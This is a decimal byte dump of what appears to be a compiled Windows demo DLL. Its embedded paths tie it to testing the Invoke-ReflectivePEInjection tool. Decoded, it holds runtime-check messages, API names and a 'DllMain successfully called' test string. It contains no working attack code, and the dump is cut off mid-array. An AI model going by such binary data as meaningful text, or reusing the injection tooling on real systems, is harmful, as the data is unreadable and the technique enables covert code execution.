0,101,0,114,0,97,0,116,0,111,0,114,0,32,0,110,0,111,0,116,0,32,0,100,0,101,0,114,0,101,0,102,0,101,0,114,0,101,0,110,0,99,0,97,0,98,0,108,0,101,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,99,0,58,0,92,0,112,0,114,0,111,0,103,0,114,0,97,0,109,0,32,0,102,0,105,0,108,0,101,0,115,0,32,0,40,0,120,0,56,0,54,0,41,0,92,0,109,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,118,0,105,0,115,0,117,0,97,0,108,0,32,0,115,0,116,0,117,0,100,0,105,0,111,0,32,0,49,0,48,0,46,0,48,0,92,0,118,0,99,0,92,0,105,0,110,0,99,0,108,0,117,0,100,0,101,0,92,0,120,0,115,0,116,0,114,0,105,0,110,0,103,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,98,97,100,32,99,97,115,116,0,0,0,0,73,0,84,0,69,0,82,0,65,0,84,0,79,0,82,0,32,0,76,0,73,0,83,0,84,0,32,0,67,0,79,0,82,0,82,0,85,0,80,0,84,0,69,0,68,0,33,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,99,0,58,0,92,0,112,0,114,0,111,0,103,0,114,0,97,0,109,0,32,0,102,0,105,0,108,0,101,0,115,0,32,0,40,0,120,0,56,0,54,0,41,0,92,0,109,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,118,0,105,0,115,0,117,0,97,0,108,0,32,0,115,0,116,0,117,0,100,0,105,0,111,0,32,0,49,0,48,0,46,0,48,0,92,0,118,0,99,0,92,0,105,0,110,0,99,0,108,0,117,0,100,0,101,0,92,0,120,0,117,0,116,0,105,0,108,0,105,0,116,0,121,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,255,255,255,255,115,116,114,105,110,103,32,116,111,111,32,108,111,110,103,0,0,0,0,0,105,110,118,97,108,105,100,32,115,116,114,105,110,103,32,112,111,115,105,116,105,111,110,0,0,0,0,0,16,12,2,16,4,17,1,16,145,21,1,16,0,0,0,1,0,0,0,0,1,0,0,0,2,0,0,0,2,0,0,0,2,0,0,0,3,0,0,0,3,0,0,0,4,0,0,0,4,0,0,0,5,0,0,0,5,0,0,0,6,0,0,0,6,0,0,0,7,0,0,0,8,0,0,0,9,0,0,0,1,0,0,0,2,0,0,0,4,0,0,0,8,0,0,0,16,0,0,0,32,0,0,0,63,0,0,0,0,0,0,0,1,0,0,0,2,0,0,0,4,0,0,0,8,0,0,0,16,0,0,0,32,0,0,0,64,0,0,0,128,0,0,0,0,1,0,0,0,2,0,0,0,4,0,0,0,8,0,0,0,16,0,0,0,32,0,0,0,48,0,0,0,64,0,0,0,128,0,0,192,1,0,0,0,14,0,0,0,48,0,0,0,0,0,0,1,0,0,0,2,0,0,0,4,0,0,0,16,0,0,0,1,0,0,0,2,0,0,0,4,0,0,0,8,0,0,0,16,0,0,0,64,0,0,0,128,0,0,0,32,0,0,0,0,0,0,0,1,0,0,0,2,0,0,0,68,108,108,77,97,105,110,32,115,117,99,99,101,115,115,102,117,108,108,121,32,99,97,108,108,101,100,46,10,0,0,0,0,0,0,0,99,58,92,82,101,102,108,101,99,116,105,118,101,76,111,97,100,101,114,84,101,115,116,92,68,108,108,77,97,105,110,46,116,120,116,0,0,0,0,0,0,0,0,0,102,58,92,100,100,92,118,99,116,111,111,108,115,92,99,114,116,95,98,108,100,92,115,101,108,102,95,120,56,54,92,99,114,116,92,115,114,99,92,108,111,99,97,108,101,48,46,99,112,112,0,0,0,0,0,0,0,0,0,0,0,0,0,0,172,12,2,16,73,18,1,16,0,0,0,0,0,0,0,0,102,58,92,100,100,92,118,99,116,111,111,108,115,92,99,114,116,95,98,108,100,92,115,101,108,102,95,120,56,54,92,99,114,116,92,115,114,99,92,99,114,116,100,108,108,46,99,0,0,0,0,0,0,0,0,0,0,0,0,0,85,110,107,110,111,119,110,32,82,117,110,116,105,109,101,32,67,104,101,99,107,32,69,114,114,111,114,10,13,0,0,0,0,0,0,0,83,116,97,99,107,32,109,101,109,111,114,121,32,97,114,111,117,110,100,32,95,97,108,108,111,99,97,32,119,97,115,32,99,111,114,114,117,112,116,101,100,10,13,0,0,0,0,0,0,0,0,0,65,32,108,111,99,97,108,32,118,97,114,105,97,98,108,101,32,119,97,115,32,117,115,101,100,32,98,101,102,111,114,101,32,105,116,32,119,97,115,32,105,110,105,116,105,97,108,105,122,101,100,10,13,0,0,0,0,0,0,0,0,0,0,0,83,116,97,99,107,32,109,101,109,111,114,121,32,119,97,115,32,99,111,114,114,117,112,116,101,100,10,13,0,0,0,0,0,0,0,0,0,0,0,0,65,32,99,97,115,116,32,116,111,32,97,32,115,109,97,108,108,101,114,32,100,97,116,97,32,116,121,112,101,32,104,97,115,32,99,97,117,115,101,100,32,97,32,108,111,115,115,32,111,102,32,100,97,116,97,46,32,32,73,102,32,116,104,105,115,32,119,97,115,32,105,110,116,101,110,116,105,111,110,97,108,44,32,121,111,117,32,115,104,111,117,108,100,32,109,97,115,107,32,116,104,101,32,115,111,117,114,99,101,32,111,102,32,116,104,101,32,99,97,115,116,32,119,105,116,104,32,116,104,101,32,97,112,112,114,111,112,114,105,97,116,101,32,98,105,116,109,97,115,107,46,32,32,70,111,114,32,101,120,97,109,112,108,101,58,32,32,10,13,9,99,104,97,114,32,99,32,61,32,40,105,32,38,32,48,120,70,70,41,59,10,13,67,104,97,110,103,105,110,103,32,116,104,101,32,99,111,100,101,32,105,110,32,116,104,105,115,32,119,97,121,32,119,105,108,108,32,110,111,116,32,97,102,102,101,99,116,32,116,104,101,32,113,117,97,108,105,116,121,32,111,102,32,116,104,101,32,114,101,115,117,108,116,105,110,103,32,111,112,116,105,109,105,122,101,100,32,99,111,100,101,46,10,13,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,84,104,101,32,118,97,108,117,101,32,111,102,32,69,83,80,32,119,97,115,32,110,111,116,32,112,114,111,112,101,114,108,121,32,115,97,118,101,100,32,97,99,114,111,115,115,32,97,32,102,117,110,99,116,105,111,110,32,99,97,108,108,46,32,32,84,104,105,115,32,105,115,32,117,115,117,97,108,108,121,32,97,32,114,101,115,117,108,116,32,111,102,32,99,97,108,108,105,110,103,32,97,32,102,117,110,99,116,105,111,110,32,100,101,99,108,97,114,101,100,32,119,105,116,104,32,111,110,101,32,99,97,108,108,105,110,103,32,99,111,110,118,101,110,116,105,111,110,32,119,105,116,104,32,97,32,102,117,110,99,116,105,111,110,32,112,111,105,110,116,101,114,32,100,101,99,108,97,114,101,100,32,119,105,116,104,32,97,32,100,105,102,102,101,114,101,110,116,32,99,97,108,108,105,110,103,32,99,111,110,118,101,110,116,105,111,110,46,10,13,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,255,1,16,176,253,1,16,136,253,1,16,72,253,1,16,20,253,1,16,240,252,1,16,1,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,83,116,97,99,107,32,97,114,111,117,110,100,32,116,104,101,32,118,97,114,105,97,98,108,101,32,39,0,39,32,119,97,115,32,99,111,114,114,117,112,116,101,100,46,0,0,0,0,84,104,101,32,118,97,114,105,97,98,108,101,32,39,0,0,39,32,105,115,32,98,101,105,110,103,32,117,115,101,100,32,119,105,116,104,111,117,116,32,98,101,105,110,103,32,105,110,105,116,105,97,108,105,122,101,100,46,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,82,117,110,45,84,105,109,101,32,67,104,101,99,107,32,70,97,105,108,117,114,101,32,35,37,100,32,45,32,37,115,0,0,0,0,0,0,0,0,0,85,110,107,110,111,119,110,32,77,111,100,117,108,101,32,78,97,109,101,0,0,0,0,0,85,110,107,110,111,119,110,32,70,105,108,101,110,97,109,101,0,0,0,0,0,0,0,0,82,0,117,0,110,0,45,0,84,0,105,0,109,0,101,0,32,0,67,0,104,0,101,0,99,0,107,0,32,0,70,0,97,0,105,0,108,0,117,0,114,0,101,0,32,0,35,0,37,0,100,0,32,0,45,0,32,0,37,0,115,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,82,0,117,0,110,0,116,0,105,0,109,0,101,0,32,0,67,0,104,0,101,0,99,0,107,0,32,0,69,0,114,0,114,0,111,0,114,0,46,0,10,0,13,0,32,0,85,0,110,0,97,0,98,0,108,0,101,0,32,0,116,0,111,0,32,0,100,0,105,0,115,0,112,0,108,0,97,0,121,0,32,0,82,0,84,0,67,0,32,0,77,0,101,0,115,0,115,0,97,0,103,0,101,0,46,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,83,116,97,99,107,32,99,111,114,114,117,112,116,101,100,32,110,101,97,114,32,117,110,107,110,111,119,110,32,118,97,114,105,97,98,108,101,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,83,116,97,99,107,32,97,114,101,97,32,97,114,111,117,110,100,32,95,97,108,108,111,99,97,32,109,101,109,111,114,121,32,114,101,115,101,114,118,101,100,32,98,121,32,116,104,105,115,32,102,117,110,99,116,105,111,110,32,105,115,32,99,111,114,114,117,112,116,101,100,10,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,37,115,37,115,37,115,37,115,0,0,0,0,62,32,0,0,10,0,0,0,37,115,37,115,37,112,37,115,37,108,100,37,115,37,100,37,115,0,0,0,0,0,0,0,0,0,0,0,83,116,97,99,107,32,97,114,101,97,32,97,114,111,117,110,100,32,95,97,108,108,111,99,97,32,109,101,109,111,114,121,32,114,101,115,101,114,118,101,100,32,98,121,32,116,104,105,115,32,102,117,110,99,116,105,111,110,32,105,115,32,99,111,114,114,117,112,116,101,100,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,10,65,100,100,114,101,115,115,58,32,48,120,0,0,0,0,10,83,105,122,101,58,32,0,0,0,0,0,10,65,108,108,111,99,97,116,105,111,110,32,110,117,109,98,101,114,32,119,105,116,104,105,110,32,116,104,105,115,32,102,117,110,99,116,105,111,110,58,32,0,0,0,0,0,0,0,0,0,0,0,10,68,97,116,97,58,32,60,0,0,0,0,119,115,112,114,105,110,116,102,65,0,0,0,117,0,115,0,101,0,114,0,51,0,50,0,46,0,100,0,108,0,108,0,0,0,0,0,0,0,0,0,37,46,50,88,32,0,0,0,65,32,118,97,114,105,97,98,108,101,32,105,115,32,98,101,105,110,103,32,117,115,101,100,32,119,105,116,104,111,117,116,32,98,101,105,110,103,32,105,110,105,116,105,97,108,105,122,101,100,46,0,0,0,0,0,0,0,0,0,0,0,0,0,83,116,97,99,107,32,97,114,111,117,110,100,32,95,97,108,108,111,99,97,32,99,111,114,114,117,112,116,101,100,0,0,0,0,0,0,0,0,0,0,76,111,99,97,108,32,118,97,114,105,97,98,108,101,32,117,115,101,100,32,98,101,102,111,114,101,32,105,110,105,116,105,97,108,105,122,97,116,105,111,110,0,0,0,0,0,0,0,0,0,0,0,83,116,97,99,107,32,109,101,109,111,114,121,32,99,111,114,114,117,112,116,105,111,110,0,0,0,0,0,67,97,115,116,32,116,111,32,115,109,97,108,108,101,114,32,116,121,112,101,32,99,97,117,115,105,110,103,32,108,111,115,115,32,111,102,32,100,97,116,97,0,0,0,0,0,0,0,0,0,0,0,83,116,97,99,107,32,112,111,105,110,116,101,114,32,99,111,114,114,117,112,116,105,111,110,0,0,0,0,0,0,0,0,136,4,2,16,84,4,2,16,56,4,2,16,4,4,2,16,220,3,2,16,0,0,0,0,136,35,2,16,224,35,2,16,0,0,0,0,0,0,0,0,1,0,0,0,2,0,0,0,3,0,0,0,4,0,0,0,77,0,83,0,80,0,68,0,66,0,49,0,48,0,48,0,46,0,68,0,76,0,76,0,0,0,0,0,77,0,83,0,86,0,67,0,82,0,49,0,48,0,48,0,68,0,46,0,100,0,108,0,108,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,114,0,0,0,80,68,66,79,112,101,110,86,97,108,105,100,97,116,101,53,0,0,0,0,69,0,110,0,118,0,105,0,114,0,111,0,110,0,109,0,101,0,110,0,116,0,68,0,105,0,114,0,101,0,99,0,116,0,111,0,114,0,121,0,0,0,0,0,0,0,0,0,0,0,0,0,83,0,79,0,70,0,84,0,87,0,65,0,82,0,69,0,92,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,92,0,86,0,105,0,115,0,117,0,97,0,108,0,83,0,116,0,117,0,100,0,105,0,111,0,92,0,49,0,48,0,46,0,48,0,92,0,83,0,101,0,116,0,117,0,112,0,92,0,86,0,83,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,82,101,103,67,108,111,115,101,75,101,121,0,0,0,0,0,82,101,103,81,117,101,114,121,86,97,108,117,101,69,120,87,0,0,0,0,82,101,103,79,112,101,110,75,101,121,69,120,87,0,0,0,65,0,68,0,86,0,65,0,80,0,73,0,51,0,50,0,46,0,68,0,76,0,76,0,0,0,0,0,0,0,0,0,68,0,76,0,76,0,0,0,0,0,0,0,77,0,83,0,80,0,68,0,66,0,49,0,48,0,48,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,82,83,68,83,64,160,29,194,36,86,217,72,179,165,176,93,177,59,26,136,2,0,0,0,67,58,92,103,105,116,92,80,111,119,101,114,83,104,101,108,108,92,73,110,118,111,107,101,45,82,101,102,108,101,99,116,105,118,101,80,69,73,110,106,101,99,116,105,111,110,92,68,101,109,111,68,76,76,95,82,101,109,111,116,101,80,114,111,99,101,115,115,92,68,101,98,117,103,92,68,101,109,111,68,76,76,95,82,101,109,111,116,101,80,114,111,99,101,115,115,46,112,100,98,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,96,0,0,0,0,0,0,0,0,32,2,16,120,9,2,16,0,0,0,0,0,0,0,0,0,0,0,0,5,0,0,0,140,9,2,16,0,0,0,0,168,9,2,16,204,9,2,16,24,10,2,16,44,11,2,16,80,11,2,16,0,0,0,0,0,0,0,0,0,32,2,16,4,0,0,0,0,0,0,0,255,255,255,255,0,0,0,0,64,0,0,0,120,9,2,16,0,0,0,0,0,0,0,0,72,32,2,16,3,0,0,0,0,0,0,0,255,255,255,255,0,0,0,0,64,0,0,0,240,9,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,0,0,0,4,10,2,16,0,0,0,0,204,9,2,16,24,10,2,16,44,11,2,16,80,11,2,16,0,0,0,0,144,32,2,16,2,0,0,0,0,0,0,0,0,0,0,0,4,0,0,0,80,0,0,0,60,10,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,80,10,2,16,0,0,0,0,96,10,2,16,132,10,2,16,200,10,2,16,0,0,0,0,144,32,2,16,2,0,0,0,0,0,0,0,255,255,255,255,0,0,0,0,64,0,0,0,60,10,2,16,0,0,0,0,0,0,0,0,208,32,2,16,1,0,0,0,0,0,0,0,255,255,255,255,0,0,0,0,64,0,0,0,168,10,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,188,10,2,16,0,0,0,0,132,10,2,16,200,10,2,16,0,0,0,0,240,32,2,16,0,0,0,0,8,0,0,0,255,255,255,255,0,0,0,0,64,0,0,0,236,10,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,11,2,16,0,0,0,0,8,11,2,16,0,0,0,0,240,32,2,16,0,0,0,0,0,0,0,0,255,255,255,255,0,0,0,0,64,0,0,0,236,10,2,16,0,0,0,0,0,0,0,0,208,32,2,16,1,0,0,0,0,0,0,0,0,0,0,0,4,0,0,0,64,0,0,0,168,10,2,16,0,0,0,0,0,0,0,0,240,32,2,16,0,0,0,0,8,0,0,0,0,0,0,0,4,0,0,0,64,0,0,0,236,10,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,33,2,16,140,11,2,16,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,160,11,2,16,0,0,0,0,172,11,2,16,208,11,2,16,0,0,0,0,20,33,2,16,1,0,0,0,0,0,0,0,255,255,255,255,0,0,0,0,64,0,0,0,140,11,2,16,0,0,0,0,0,0,0,0,92,33,2,16,0,0,0,0,0,0,0,0,255,255,255,255,0,0,0,0,64,0,0,0,244,11,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,8,12,2,16,0,0,0,0,208,11,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,232,33,2,16,40,12,2,16,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,60,12,2,16,0,0,0,0,72,12,2,16,108,12,2,16,0,0,0,0,232,33,2,16,1,0,0,0,0,0,0,0,255,255,255,255,0,0,0,0,64,0,0,0,40,12,2,16,0,0,0,0,0,0,0,0,196,33,2,16,0,0,0,0,0,0,0,0,255,255,255,255,0,0,0,0,64,0,0,0,144,12,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,164,12,2,16,0,0,0,0,108,12,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,34,2,16,196,12,2,16,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,216,12,2,16,0,0,0,0,224,12,2,16,0,0,0,0,20,34,2,16,0,0,0,0,0,0,0,0,255,255,255,255,0,0,0,0,64,0,0,0,196,12,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,93,18,1,16,93,18,1,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,68,18,1,16,68,18,1,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,255,255,255,255,32,179,1,16,0,0,0,0,76,179,1,16,34,5,147,25,2,0,0,0,72,20,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,255,255,255,255,160,179,1,16,34,5,147,25,1,0,0,0,132,20,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,255,255,255,255,224,179,1,16,34,5,147,25,1,0,0,0,180,20,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,34,5,147,25,5,0,0,0,8,21,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,255,255,255,255,32,180,1,16,0,0,0,0,40,180,1,16,1,0,0,0,51,180,1,16,0,0,0,0,62,180,1,16,0,0,0,0,73,180,1,16,0,0,0,0,0,0,0,0,34,5,147,25,6,0,0,0,92,21,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,255,255,255,255,176,180,1,16,0,0,0,0,184,180,1,16,1,0,0,0,195,180,1,16,0,0,0,0,206,180,1,16,0,0,0,0,217,180,1,16,0,0,0,0,228,180,1,16,0,0,0,0,0,0,0,0,255,255,255,255,48,181,1,16,34,5,147,25,1,0,0,0,148,21,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,255,255,255,255,112,181,1,16,34,5,147,25,1,0,0,0,196,21,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,34,5,147,25,5,0,0,0,24,22,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,255,255,255,255,176,181,1,16,0,0,0,0,184,181,1,16,1,0,0,0,195,181,1,16,0,0,0,0,206,181,1,16,0,0,0,0,217,